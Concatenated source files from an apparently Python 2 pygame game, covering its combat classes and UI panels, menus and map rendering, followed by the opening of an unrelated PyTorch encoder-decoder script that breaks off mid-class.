            if not 0<self.y<600:
                self.program = self.program_go_to(1300,1300)
    def program_go_to(self,x,y):
        """Behaviour: step toward (x, y); once within ~1-2 units switch to
        staying put for 300 ticks. div_by_zero supplies the step sign."""
        while True:
            dy = div_by_zero(y - self.y,abs(y - self.y))
            dx = div_by_zero(x - self.x,abs(x - self.x))
            if abs(y - self.y)<2 and abs(x - self.x)<1:
                self.program = self.program_stay(300)
            self.x += dx*self.speed
            self.y += dy*self.speed
            yield None
    def order_to_go(self,dx,dy):
        """Move one step of (dx, dy) scaled by speed (direct player input)."""
        self.x+=dx*self.speed
        self.y+=dy*self.speed
    def get_stats(self):
        # Not implemented yet.
        pass
    def get_pos(self):
        return (self.x,self.y)
    def attack(self):
        """Hit the active target, or drop out of the fight if there is none.

        Assumes self.fight was set by Fight — TODO confirm attack() is never
        called outside a fight.
        """
        print self.name, ': arrgh!!!'
        if self.active_target is not None:
            self.active_target.be_attacked(self,Damage())
        else:
            print 'i have no target'
            self.fight.remove_fighter(self)
    def be_attacked(self,enemy,damage):
        """Apply armor-reduced damage; leave the fight when hp drops to 0.

        Note: (100 - armor)/100 is integer division under Py2, so armor
        only matters in whole-percent steps.
        """
        self.hp -= damage.power * (100 - self.armor)/100
        self.last_enemy = enemy
        print self.name,': i got %i %s damage' % (damage.power,
                                                  damage.type),'my hp = ',self.hp
        if self.hp <=0:
            self.fight.remove_fighter(self)
            print self.name, 'is dead'
    def select_active_target(self):
        """Re-target the last attacker if it is still in the fight."""
        if self.last_enemy in self.fight.fighters:
            self.active_target = self.last_enemy
        else:
            self.active_target = None
    def set_active_target(self, target):
        self.active_target = target
    def begin_fight(self, target):
        """Start a new two-party Fight between self and target."""
        self.set_active_target(target)
        target.set_active_target(self)
        return Fight([self,target])
class Damage(object):
    """A damage packet: always 30 points of physical damage."""
    def __init__(self):
        self.type, self.power = 'physical', 30
class Fight(object):
    """Round-robin combat between two or more fighters."""
    def __init__(self, fighters):
        self.fighters = fighters
        self._iterator = 0              # index of the fighter who acts next
        for member in fighters:
            member.fight = self         # back-reference so fighters can leave
    def __repr__(self):
        names = ' '.join(member.name for member in self.fighters)
        return 'In fight:' + names
    def step(self):
        """Let the current fighter act, then advance the turn pointer."""
        attacker = self.fighters[self._iterator]
        attacker.attack()
        self._iterator = (self._iterator + 1) % len(self.fighters)
    def add_fighter(self, fighter):
        """Append a new fighter to the end of the turn order."""
        fighter.fight = self
        self.fighters.append(fighter)
    def remove_fighter(self, fighter):
        """Remove fighter from fighters list"""
        idx = self.fighters.index(fighter)
        if idx <= self._iterator:
            # Shift the turn pointer so the remaining order is preserved.
            self._iterator -= 1
        del self.fighters[idx]
        fighter.fight = None
        fighter.last_enemy = None
        # Everyone re-targets, since their target may just have left.
        for member in self.fighters:
            member.select_active_target()
    def is_active(self):
        """A fight stays active while at least two fighters remain."""
        return len(self.fighters) > 1
--- FILE SEPARATOR ---
import pygame
import graphic
from map import Map
from model import Game
from graphic import Camera
from graphic import ImageStorage
class UiController(object):
    """Mediator between pygame events, the Game model and all UI panels.

    Owns every panel, maintains the z-ordered list of visible ones, and
    routes translated events to them until one accepts.
    """
    def __init__(self):
        self.map_drawer = MapDrawer()
        self.game_field = UiGameField(self)
        self.game_panel = UiGamePanel(self)
        self.mini_map = UiMiniMap(self)
        self.inventory_panel = UiInventory(self)
        self.map_panel = UiMap(self)
        self.main_menu = UiMainMenu(self)
        self.exit_menu = UiExitMenu(self)
        self.exit_without_save = UiExitWithoutSave(self)
        self.pause_menu = UiPauseMenu(self)
        self.options_menu = UiOptionsMenu(self)
        self.load_menu = UiLoadMenu(self)
        self.save_menu = UiSaveMenu(self)
        self.visible_panels = []    # kept sorted deepest-first (see UiPanel)
    def do_action(self,event):
        """Offer `event` to visible panels, topmost first, until one takes it."""
        for panel in self.visible_panels:
            action_accepted = panel.offer_action(event)
            if action_accepted:
                break
    def hide_all_panels(self):
        # Iterate a copy: set_unvisible() mutates visible_panels.
        copy = self.visible_panels[:]
        for panel in copy:
            panel.set_unvisible()
    def go_to_main_menu(self):
        self.hide_all_panels()
        self.main_menu.set_visible()
    def go_to_play(self):
        """Switch to the in-game screen and unpause the model."""
        self.hide_all_panels()
        Game().paused = False
        self.game_field.set_visible()
        self.mini_map.set_visible()
        self.game_panel.set_visible()
    def pause(self):
        self.pause_menu.set_visible()
        Game().paused = True
    def quick_save(self):
        pass    # not implemented yet
    def open_save_menu(self):
        pass    # not implemented yet
    def open_load_menu(self):
        pass    # not implemented yet
    def open_options_menu(self):
        pass    # not implemented yet
    def load_game(self):
        pass    # not implemented yet
    def ask_about_exit(self):
        self.exit_menu.set_visible()
    def ask_about_exit_without_save(self):
        self.exit_without_save.set_visible()
    def exit(self):
        # Post QUIT so the main loop ends on its next iteration.
        pygame.event.post(pygame.event.Event(pygame.QUIT))
    def generate_new_map(self):
        """Regenerate the world and refresh every map-derived image."""
        self.map_drawer.map_generate()
        self.mini_map.prepare_image()
        self.map_panel.prepare_image()
        self.game_field.prepare_image()
        self.move_mini_map_to_player()
    def open_inventory(self):
        self.inventory_panel.set_visible()
    def open_map(self):
        self.map_panel.set_visible()
    def map_move(self, pos):
        """Center the mini-map viewport on map tile pos=(x, y), clamped so
        the viewport never runs past the map edge.

        (Signature generalized from the Py2-only tuple parameter
        `def map_move(self,(x,y))`; callers still pass a single tuple.)
        """
        x, y = pos
        map_width = self.map_drawer.get_map_width()
        map_height = self.map_drawer.get_map_height()
        # Viewport edge length in tiles; floor division keeps it integral.
        c = self.mini_map.width // self.mini_map.zoom
        half = c // 2
        # BUG FIX: the original clamped with max() and then unconditionally
        # overwrote the result with min(), losing the lower bound entirely.
        self.mini_map.start_x = max(0, min(x - half, map_width - c))
        self.mini_map.start_y = max(0, min(y - half, map_height - c))
        self.mini_map.update_image()
    def player_keyboard_move(self,direction):
        """Step the player in `direction` and keep camera/mini-map in sync."""
        player = Game().player
        if direction == 'up':
            player.order_to_go(0,-1)
        if direction == 'down':
            player.order_to_go(0,1)
        if direction == 'left':
            player.order_to_go(-1,0)
        if direction == 'right':
            player.order_to_go(1,0)
        Camera().update(player.get_pos())
        self.move_mini_map_to_player()
    def player_mouse_move(self,x,y):
        """Step the player toward screen point (x, y)."""
        player = Game().player
        px,py = Camera().coord_transform(player.get_pos())
        dx = x - px
        dy = y - py
        # Chebyshev normalization; under Py2 integer division this yields a
        # unit step of -1/0/1 per axis — confirm before porting to Py3.
        norm = max(abs(dx),abs(dy))
        dx /= norm
        dy /= norm
        player.order_to_go(dx,dy)
        Camera().update(player.get_pos())
        self.move_mini_map_to_player()
    def move_mini_map_to_player(self):
        """Keep the mini-map viewport centred on the player's tile."""
        player_x,player_y = Game().player.get_pos()
        tile_size = self.game_field.tile_size
        self.map_move((player_x/tile_size,player_y/tile_size))
class Event(object):
    """Normalized input event: translates raw pygame events into the small
    vocabulary the UI panels understand ('key press', 'left click', ...)."""
    def __init__(self):
        self.clear()
    def __repr__(self):
        lines = ["%s: %s" % pair for pair in self.__dict__.items()]
        return '\n'.join(lines)
    def clear(self):
        """Reset every field to the neutral 'empty' state."""
        self.event_type = 'empty'
        self.direction = ''
        self.key = None
        self.x = 0
        self.y = 0
        self.dx = 0
        self.dy = 0
    def get_pygame_event(self, event):
        """Fill this object from one pygame event (event types are mutually
        exclusive, so an elif chain covers every case)."""
        self.clear()
        if event.type == pygame.KEYUP:
            self.event_type = 'key press'
            self.key = event.key
        elif event.type == pygame.USEREVENT:
            # USEREVENTs are reposted by main.py with a `code` attribute.
            self.event_type = event.code
            if event.code == 'keyboard direct':
                self.direction = event.direct
            elif event.code == 'mouse direct':
                self.x, self.y = event.pos
        elif event.type == pygame.MOUSEBUTTONUP:
            self.x, self.y = event.pos
            if event.button == 1:
                self.event_type = 'left click'
            elif event.button == 3:
                self.event_type = 'right click'
        elif event.type == pygame.MOUSEMOTION:
            self.x, self.y = event.pos
            #self.dx,self.dy = event.rel
            if event.buttons[0] == 1:
                self.event_type = 'drag'
            elif event.buttons == (0, 0, 0):
                self.event_type = 'mouse move'
class UiPanel(object):
    """Base class for all UI panels: a colored rectangle that may carry a
    list of UiButtons in self.data and renders itself into self.image.

    Panels with higher depth receive events first (do_action order) and
    are drawn on top (the main loop draws reversed(visible_panels)).
    """
    def __init__(self,controller,
                 color=(255,0,0),
                 depth=0,visible=False,
                 top=0,left=0,
                 width=100,height=100,):
        self.controller = controller
        self.visible = visible
        self.top = top
        self.left = left
        self.width = width
        self.height = height
        self.depth = depth
        self.color = color
        self.data = None
        self.image = None
    def __repr__(self):
        return '%s' % self.__class__
    def offer_action(self,action):
        # Base panels consume nothing; subclasses override.
        return False
    def draw(self):
        """Return the panel surface, building it lazily on first draw."""
        if self.image is None:
            self.prepare_image()
        else:
            self.update_image()
        return self.image
    def prepare_image(self):
        """Render the background and pre-render both button images
        (normal / mouse-over) for every button in self.data.

        NOTE(review): the hasattr guard passes when self.data is None (as
        this base __init__ sets it) and iterating None would raise —
        subclasses in this file either assign a list or override this
        method, so the guard only helps those that never define data.
        """
        self.image = pygame.Surface((self.width, self.height))
        self.image.fill(self.color)
        font20 = pygame.font.Font(None, 20)
        if hasattr(self,'data'):
            for button in self.data:
                button.image1 = pygame.Surface((button.width,
                                                button.height))
                button.image1.fill(button.color)
                button.image2 = pygame.Surface((button.width,
                                                button.height))
                if not button.static:
                    # Mouse-over variant: a slightly darkened button color.
                    r,g,b = button.color
                    color=(int(r*0.7),int(g*0.8),int(b*0.9))
                    button.image2.fill(color)
                if button.mode in ('image','text and image'):
                    image = ImageStorage()[button.image_sourse][0][0]
                    button.image1.blit(image,(0,0))
                    button.image2.blit(image,(0,0))
                    # Text (if any) starts right of the icon.
                    x,_ = image.get_size()
                else:
                    x = 0
                if button.mode in ('text','text and image'):
                    textImg = font20.render(button.caption, 1, (0,0,0))
                    button.image1.blit(textImg,(x+5,0));
                    button.image2.blit(textImg,(x+5,0));
                self.image.blit(button.image1,(button.left,button.top))
    def update_image(self):
        """Re-blit each button using its current hover state."""
        if hasattr(self,'data'):
            for button in self.data:
                self.image.blit(button.get_image(),(button.left,button.top))
    def set_visible(self):
        """Show the panel and keep visible_panels sorted deepest-first."""
        if self.visible:
            pass
        else:
            self.visible = True
            self.controller.visible_panels.append(self)
            self.controller.visible_panels.sort(key=lambda x: -x.depth)
    def set_unvisible(self):
        """Hide the panel and drop it from the controller's visible list."""
        if self.visible:
            self.visible = False
            self.controller.visible_panels.remove(self)
class UiButton(object):
    """A clickable label: two pre-rendered surfaces (normal / mouse-over)
    plus its rectangle expressed in panel-local coordinates."""
    def __init__(self, name,
                 mode,  # one of: 'text', 'image', 'text and image'
                 top=0, left=0,
                 width=100, height=100,
                 image_sourse='',
                 static=False,
                 color=(200, 60, 0)
                 ):
        self.name = name
        self.caption = name              # displayed text defaults to the name
        self.mode = mode
        self.top, self.left = top, left
        self.width, self.height = width, height
        self.static = static             # static buttons get no hover tint
        self.color = color
        self.image_sourse = image_sourse
        self.image1 = None               # rendered later by the owning panel
        self.image2 = None               # mouse-over variant
        self.state = 'main'
    def get_image(self):
        """Return the surface matching the current hover state."""
        by_state = {'main': self.image1, 'mouseover': self.image2}
        return by_state.get(self.state)
    def is_mouse_over(self, x, y):
        """True when panel-local point (x, y) lies inside the button."""
        inside_x = x in range(self.left, self.left + self.width)
        inside_y = y in range(self.top, self.top + self.height)
        return inside_x and inside_y
class uiTable(object):
    # Placeholder: no table widget is implemented yet.
    pass
class UiGameField(UiPanel):
    """The main in-game viewport: scrolling map background, per-tile object
    buttons and character sprites, all offset by the Camera position."""
    def __init__(self,controller):
        self.tile_size=40
        self.controller = controller
        self.visible = False
        self.top = 0
        self.left = 0
        self.width = 600
        self.height = 600
        self.depth = 0
        self.color = (100,50,50)
        self.image = None
        self.data1 = {}     # (tile x, tile y) -> object button, whole map
        self.data = []      # buttons currently on screen; rebuilt each frame
    def prepare_image(self):
        """Build the sprite group, render the full map background and the
        per-tile object buttons."""
        self.image = pygame.Surface((self.width, self.height))
        self.a = pygame.sprite.Group(graphic.Character_Sprite('actor2'),
                                     graphic.Character_Sprite('actor1'),
                                     graphic.Character_Sprite('actor3'),
                                     #graphic.Character_Sprite('evil'),
                                     )
        # Bind each sprite to its model-side NPC by position in the group.
        i=0
        for sprite in self.a:
            sprite.data = Game().npcs[i]
            i +=1
        playersprite = graphic.Character_Sprite('evil')
        playersprite.data = Game().player
        self.a.add(playersprite)
        Camera().update(Game().player.get_pos())
        map_drawer = self.controller.map_drawer
        self.bg = map_drawer.get_all_map_image(self.tile_size)
        self.image.blit(self.bg,(-Camera().dx,-Camera().dy))
        self.data1 = map_drawer.prepare_map_objects(self.tile_size)
        '''test=ImageStorage()['plants']
        for i in range(len(test)):
            testrow=test[i]
            for j in range(len(testrow)):
                testimg = testrow[j]
                self.bg.blit(testimg,(i*40,j*40))'''
        self.a.draw(self.image)
    def update_image(self):
        """Per-frame redraw: animate sprites, scroll the background, and blit
        only the object buttons within a screen's radius of the player."""
        if not Game().paused:
            # Advance sprite animation every animate_divider-th frame.
            if Game().counter % Game().animate_divider == 0:
                animate = True
            else:
                animate = False
            self.image.fill((0,0,0))#for clearing sprites
            self.a.clear(self.image,self.image)
            self.a.update(animate)
            self.image.blit(self.bg,(-Camera().dx,-Camera().dy)) #pos bg
            #objects
            self.data=[]
            player_x,player_y = Game().player.get_pos()
            # NOTE(review): relies on Py2 integer division — under Py3 these
            # bounds become floats and range() would raise; confirm before
            # any port.
            for y in range((player_y-self.height/2)/self.tile_size,
                           (player_y+self.height/2)/self.tile_size):
                for x in range((player_x-self.width/2)/self.tile_size,
                               (player_x+self.width/2)/self.tile_size):
                    if (x,y) in self.data1:
                        btn = self.data1[x,y]
                        self.data.append(btn)
                        img=btn.get_image()
                        self.image.blit(img,(x*self.tile_size-Camera().dx,y*self.tile_size-Camera().dy))
            self.a.draw(self.image)
    def offer_action(self,event):
        """Route movement events to the controller; update hover states of
        the visible object buttons."""
        ret = False
        if event.event_type == 'keyboard direct':
            self.controller.player_keyboard_move(event.direction)
            ret = True
        if event.event_type == 'mouse direct':
            self.controller.player_mouse_move(event.x,event.y)
            ret = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                # Buttons are stored in world coords, so translate the mouse
                # point by the camera offset before hit-testing.
                if button.is_mouse_over(event.x+Camera().dx,
                                        event.y+Camera().dy):
                    button.state = 'mouseover'
            ret = True
        return ret
class UiGamePanel(UiPanel):
    """Bottom toolbar shown during play (inventory/craft/exit buttons) and
    the in-game hotkey handler."""
    def __init__(self, controller):
        self.controller = controller
        self.visible = False
        self.top = 565
        self.left = 5
        self.width = 400
        self.height = 30
        self.depth = 1
        self.color = (200, 0, 100)
        self.image = None
        self.data = [UiButton('inventory', 'image', 5, 5, 100, 25, 'icon-backpack'),
                     UiButton('craft', 'text and image', 5, 115, 100, 25, 'icon-craft'),
                     UiButton('exit', 'text', 5, 220, 100, 25),
                     ]
    def offer_action(self, event):
        """Consume the pause/inventory/map hotkeys and hover updates."""
        handled = False
        if event.event_type == 'key press':
            if event.key in (27, 19):        # Esc / Pause
                self.controller.pause()
                handled = True
            if event.key in (105,):          # 'i'
                self.controller.open_inventory()
                handled = True
            if event.key in (109,):          # 'm'
                self.controller.open_map()
                handled = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                if button.is_mouse_over(event.x - self.left,
                                        event.y - self.top):
                    button.state = 'mouseover'
            handled = True
        return handled
class UiMap(UiPanel):
    """Large world-map overlay; clicking it recenters the mini-map viewport."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 85
        self.left = 42
        self.width = 513
        self.height = 513
        self.depth = 9
        self.color = (60,150,40)
        self.image = None
        self.zoom = 4       # pixels per map tile
        self.data = None
        self.start_x=0      # viewport origin, in tiles
        self.start_y=0
    def prepare_image(self):
        """Render the whole map once at this panel's zoom."""
        self.image = pygame.Surface((self.width, self.height))
        map_drawer = self.controller.map_drawer
        self.all_map_image = map_drawer.get_all_map_image(self.zoom)
        self.image.blit(self.all_map_image,(0,0))
    def update_image(self):
        """Redraw the viewport and mark the player as a red dot."""
        tile_size = self.controller.game_field.tile_size
        self.image.fill((0,0,0))
        player_x,player_y = Game().player.get_pos()
        pixel = pygame.Surface((self.zoom, self.zoom))
        pixel.fill((255,0,0))
        self.image.blit(self.all_map_image,(-self.start_x*self.zoom,
                                            -self.start_y*self.zoom))
        self.image.blit(pixel,
                        ((player_x/tile_size-self.start_x)*self.zoom,
                         (player_y/tile_size-self.start_y)*self.zoom))
    def offer_action(self,event):
        """Esc/'m' closes; left click recenters the mini-map viewport."""
        ret = False
        if event.event_type == 'key press':
            if event.key in (27,109):
                self.set_unvisible()
                ret = True
        if event.event_type == 'left click':
            x = event.x-self.left
            y = event.y-self.top
            if x in range (0,self.width) and y in range (0,self.height):
                self.controller.map_move((x/self.zoom,y/self.zoom))
                ret = True
        if event.event_type == 'mouse direct':
            # Consume drags so panels below never see them (do_action stops
            # at the first panel that returns True).
            ret = True
        return ret
class UiMiniMap(UiMap):
    """Small always-visible corner map; the space bar regenerates the world."""
    def __init__(self, controller):
        self.controller = controller
        self.visible = False
        self.top = 5
        self.left = 451
        self.width = 129
        self.height = 129
        self.depth = 1
        self.color = (200, 0, 100)
        self.data = None
        self.image = None
        self.zoom = 8
        self.start_x = 0
        self.start_y = 0
    def offer_action(self, event):
        """Space bar (key 32) triggers generation of a new map."""
        if event.event_type == 'key press' and event.key in (32,):
            self.controller.generate_new_map()
            return True
        return False
class MapDrawer(object):
    """Renders the Map model into pygame surfaces and builds the per-tile
    object buttons. Wraps the Map singleton behind a private reference."""
    def __init__(self):
        self.__data = Map()
    def map_generate(self):
        """Regenerate the world (delegates to the Map singleton)."""
        self.__data.generate()
    def get_map_width(self):
        return self.__data.width
    def get_map_height(self):
        return self.__data.height
    def get_tile(self,size,value):
        """Return a size x size tile colored by `value` relative to the
        waterline: water, shore, vegetation bands, then snowy peaks.
        The bands cover every value, so `color` is always assigned."""
        waterline = self.__data.waterline
        if value <= waterline:
            color = (25, 25, value+75)
        elif value > waterline and value <= waterline + 10:
            color = (value+80, value+80, 100)
        elif value > waterline + 10 and value <= waterline + 40:
            color = (0, 255-value, 0)
        elif value > waterline + 40 and value <= 190:
            color = (0, 255-value, 0)
        elif value > 190:
            color = (255-value, 255-value, 255-value)
        tile = pygame.Surface((size, size))
        tile.fill(color)
        return tile
    def get_all_map_image(self,tile_size):
        """Render the whole live map grid into one surface."""
        map_width = self.__data.width
        map_height = self.__data.height
        map_data = self.__data.map
        all_map_image = pygame.Surface((tile_size * map_width,
                                        tile_size * map_height))
        for y in range(0, map_height):
            for x in range(0, map_width):
                value = int(map_data[y][x])
                tile = self.get_tile(tile_size,value)
                all_map_image.blit(tile,(x*tile_size,y*tile_size))
        return all_map_image
    def get_all_map_from_storage(self,tile_size):
        """Render the stored copy of the current map, drawing deepened
        cells as sub-grids of smaller tiles."""
        map_width = self.__data.width
        map_height = self.__data.height
        # BUG FIX: was `self.__data.storage[self.data.name]` — `self.data`
        # does not exist (the attribute is the name-mangled `__data`).
        map_data = self.__data.storage[self.__data.name]
        all_map_image = pygame.Surface((tile_size * map_width,
                                        tile_size * map_height))
        for y in range(0, map_height):
            for x in range(0, map_width):
                if not isinstance(map_data[y][x],list):
                    value = int(map_data[y][x])
                    tile = self.get_tile(tile_size,value)
                    all_map_image.blit(tile,(x*tile_size,y*tile_size))
                else:
                    square = map_data[y][x]
                    for i in range(0,len(square)):
                        for j in range(0,len(square)):
                            value = int(square[i][j])
                            # Floor division: sub-tile sizes/offsets must
                            # stay integral under either division mode.
                            sub = tile_size // len(square)
                            tile = self.get_tile(sub,value)
                            all_map_image.blit(tile,(x*tile_size+j*sub,y*tile_size+i*sub))
        return all_map_image
    def prepare_map_objects(self,tile_size):
        """Build a (tile x, tile y) -> UiButton dict for every object on the
        map; codes encode the sprite sheet cell as code = 100*row + col."""
        objsd = {}
        for key,value in self.__data.objects_on_map.items():
            x,y = key
            button = UiButton(name=value,
                              mode='image',
                              top=y*tile_size,left=x*tile_size,
                              width=30,height=30,
                              image_sourse ='flower',
                              static=False,
                              color=(200,60,0))
            # Floor division keeps these valid list indices.
            img_x = value // 100
            img_y = value % 100
            button.image1 = ImageStorage()['plants'][img_x][img_y]
            button.image2 = ImageStorage()['plants_2'][img_x][img_y]
            objsd[(x,y)]=button
        return objsd
class UiInventory(UiPanel):
    """Inventory window (contents not implemented); closed with Esc or 'i'."""
    def __init__(self, controller):
        self.controller = controller
        self.visible = False
        self.top = 300
        self.left = 300
        self.width = 280
        self.height = 100
        self.depth = 2
        self.color = (200, 100, 0)
        self.image = None
    def offer_action(self, event):
        """Esc (27) or 'i' (105) closes the window."""
        if event.event_type == 'key press' and event.key in (27, 105):
            self.set_unvisible()
            return True
        return False
class UiMainMenu(UiPanel):
    """Full-screen start menu with the five navigation buttons."""
    def __init__(self, controller):
        self.controller = controller
        self.visible = False
        self.top = 0
        self.left = 0
        self.width = 600
        self.height = 600
        self.depth = 0
        self.color = (100, 100, 0)
        self.image = None
        # Five stacked text buttons, 40px apart.
        specs = [('continue', 100), ('new', 140), ('load', 180),
                 ('options', 220), ('exit', 260)]
        self.data = [UiButton(label, 'text', y, 250, 100, 25)
                     for label, y in specs]
    def offer_action(self, event):
        """Hotkeys, hover highlighting and button clicks for the main menu."""
        handled = False
        if event.event_type == 'key press':
            if event.key in (32, 13, 112):   # space / enter / 'p' start play
                self.controller.go_to_play()
                handled = True
            if event.key == 27:              # Esc asks before quitting
                self.controller.ask_about_exit()
                handled = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                if button.is_mouse_over(event.x - self.left,
                                        event.y - self.top):
                    button.state = 'mouseover'
            handled = True
        if event.event_type == 'left click':
            # Dispatch by button name; 'new' and 'continue' both start play.
            actions = {'continue': self.controller.go_to_play,
                       'new': self.controller.go_to_play,
                       'load': self.controller.open_load_menu,
                       'options': self.controller.open_options_menu,
                       'exit': self.controller.ask_about_exit}
            for button in self.data:
                if button.is_mouse_over(event.x - self.left,
                                        event.y - self.top):
                    if button.name in actions:
                        actions[button.name]()
                        handled = True
        return handled
class UiLoadMenu(UiPanel):
    """Load-game dialog (content not implemented yet); Esc closes it."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 100
        self.left = 150
        self.width = 300
        self.height = 400
        self.depth = 15
        self.color = (100,0,40)
        self.image = None
    def offer_action(self,event):
        """Close on Esc; return True when the event was consumed."""
        ret = False
        if event.event_type == 'key press':
            # BUG FIX: was `in (27)` — `(27)` is just the int 27, so the
            # membership test raised TypeError; (27,) is the intended tuple.
            if event.key in (27,):
                self.set_unvisible()
                ret = True
        return ret
class UiSaveMenu(UiPanel):
    """Save-game dialog (content not implemented yet); Esc closes it."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 100
        self.left = 150
        self.width = 300
        self.height = 400
        self.depth = 15
        self.color = (60,50,40)
        self.image = None
    def offer_action(self,event):
        """Close on Esc; return True when the event was consumed."""
        ret = False
        if event.event_type == 'key press':
            # BUG FIX: was `in (27)` — the int 27, not a tuple, so the
            # membership test raised TypeError; (27,) is the intended tuple.
            if event.key in (27,):
                self.set_unvisible()
                ret = True
        return ret
class UiOptionsMenu(UiPanel):
    """Options dialog (content not implemented yet); Esc closes it."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 100
        self.left = 150
        self.width = 300
        self.height = 400
        self.depth = 15
        self.color = (50,0,140)
        self.image = None
    def offer_action(self,event):
        """Close on Esc; return True when the event was consumed."""
        ret = False
        if event.event_type == 'key press':
            # BUG FIX: was `in (27)` — the int 27, not a tuple, so the
            # membership test raised TypeError; (27,) is the intended tuple.
            if event.key in (27,):
                self.set_unvisible()
                ret = True
        return ret
class UiPauseMenu(UiPanel):
    """In-game pause menu: continue/save/load/options/main-menu buttons."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 100
        self.left = 150
        self.width = 300
        self.height = 400
        self.depth = 10
        self.color = (10,70,40)
        self.image = None
        # Five stacked text buttons, 40px apart.
        self.data = [UiButton('continue','text',100,100,100,25),
                     UiButton('save','text',140,100,100,25),
                     UiButton('load','text',180,100,100,25),
                     UiButton('options','text',220,100,100,25),
                     UiButton('main menu','text',260,100,100,25),
                     ]
    def offer_action(self,event):
        """Esc/Pause resumes; clicks dispatch to the controller by name."""
        ret = False
        if event.event_type == 'key press':
            if event.key in (27,19):  # Esc / Pause resume the game
                self.controller.go_to_play()
                ret = True
        if event.event_type == 'mouse direct':
            # Consume drags so the game field below doesn't move the player.
            ret = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    button.state = 'mouseover'
            ret = True
        if event.event_type == 'left click':
            for button in self.data:
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    if button.name == 'continue':
                        self.controller.go_to_play()
                        ret = True
                    if button.name == 'save':
                        self.controller.open_save_menu()
                        ret = True
                    if button.name == 'load':
                        self.controller.open_load_menu()
                        ret = True
                    if button.name == 'options':
                        self.controller.open_options_menu()
                        ret = True
                    if button.name == 'main menu':
                        self.controller.ask_about_exit_without_save()
                        ret = True
        return ret
class UiExitMenu(UiPanel):
    """Small yes/no confirmation dialog for quitting the application."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 200
        self.left = 250
        self.width = 100
        self.height = 50
        self.depth = 20
        self.color = (0,0,40)
        self.image = None
        self.data = [UiButton('yes','text',20,20,25,25),
                     UiButton('no','text',20,65,25,25),
                     ]
    def offer_action(self,event):
        """'y' or yes-click quits; Esc/'n' or no-click dismisses."""
        ret = False
        if event.event_type == 'key press':
            if event.key in (121,):   # 'y'
                self.controller.exit()
                ret = True
            if event.key in (27,110):  # Esc / 'n'
                self.set_unvisible()
                ret = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    button.state = 'mouseover'
                    ret = True
        if event.event_type == 'left click':
            for button in self.data:
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    if button.name == 'yes':
                        self.controller.exit()
                        ret = True
                    if button.name == 'no':
                        self.set_unvisible()
                        ret = True
        return ret
class UiExitWithoutSave(UiPanel):
    """Yes/no confirmation for returning to the main menu without saving."""
    def __init__(self,controller):
        self.controller = controller
        self.visible = False
        self.top = 200
        self.left = 250
        self.width = 100
        self.height = 50
        self.depth = 20
        self.color = (0,20,20)
        self.image = None
        self.data = [UiButton('yes','text',20,20,25,25),
                     UiButton('no','text',20,65,25,25),
                     ]
    def offer_action(self,event):
        """Esc or no-click cancels; yes-click jumps to the main menu."""
        ret = False
        if event.event_type == 'key press':
            # BUG FIX: was `in (27)` — `(27)` is the int 27, not a tuple,
            # so the membership test raised TypeError; (27,) is intended.
            if event.key in (27,):
                self.set_unvisible()
                ret = True
        if event.event_type == 'mouse move':
            for button in self.data:
                button.state = 'main'
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    button.state = 'mouseover'
                    ret = True
        if event.event_type == 'left click':
            for button in self.data:
                if button.is_mouse_over(event.x-self.left,
                                        event.y-self.top):
                    if button.name == 'yes':
                        self.controller.go_to_main_menu()
                        ret = True
                    if button.name == 'no':
                        self.set_unvisible()
                        ret = True
        return ret
|
[
"/functions.py",
"/graphic.py",
"/main.py",
"/map.py",
"/model.py",
"/ui.py"
] |
000Justin000/agnav
|
import os
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import math, copy, time
import pandas as pd
from transformers import AutoTokenizer
import matplotlib.pyplot as plt
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from utils import *
from IPython.core.debugger import set_trace
# Allow duplicate OpenMP runtimes to coexist (common MKL/matplotlib clash).
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
# we will use CUDA if it is available
USE_CUDA = torch.cuda.is_available()
DEVICE = torch.device('cuda:0') if USE_CUDA else torch.device("cpu")
# set random seed
# Seed numpy and torch (CPU and CUDA) for reproducible runs.
seed = 666
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
class EncoderDecoder(nn.Module):
    """
    A standard Encoder-Decoder architecture. Base for this and many
    other models.
    """
    def __init__(self, encoder, decoder, src_embed, trg_embed, evaluator):
        super().__init__()
        self.encoder = encoder
        self.decoder = decoder
        self.src_embed = src_embed
        self.trg_embed = trg_embed
        self.evaluator = evaluator
    def forward(self, src, trg, src_mask, trg_mask, src_lengths, trg_lengths):
        """Take in and process masked src and target sequences."""
        hidden, final = self.encode(src, src_mask, src_lengths)
        return self.decode(hidden, final, src_mask, trg, trg_mask)
    def encode(self, src, src_mask, src_lengths):
        """Embed the source batch and run the encoder over it."""
        embedded = self.src_embed(src)
        return self.encoder(embedded, src_mask, src_lengths)
    def decode(self, encoder_hidden, encoder_final, src_mask, trg, trg_mask,
               decoder_hidden=None):
        """Embed the target batch and run the attention decoder."""
        embedded = self.trg_embed(trg)
        return self.decoder(embedded, encoder_hidden, encoder_final,
                            src_mask, trg_mask, hidden=decoder_hidden)
class Encoder(nn.Module):
"""Encodes a sequence of word embeddings"""
def __init__(self, input_size, hidden_size, num_layers=1, dropout=0.0):
super(Encoder, self).__init__()
self.num_layers = num_layers
self.rnn = nn.GRU(input_size, hidden_size, num_layers, batch_first=True, bidirectional=True, dropout=dropout)
def forward(self, x, mask, lengths):
"""
Applies a bidirectional GRU to sequence of embeddings x.
The input mini-batch x needs to be sorted by length.
x should have dimensions [batch, time, dim].
"""
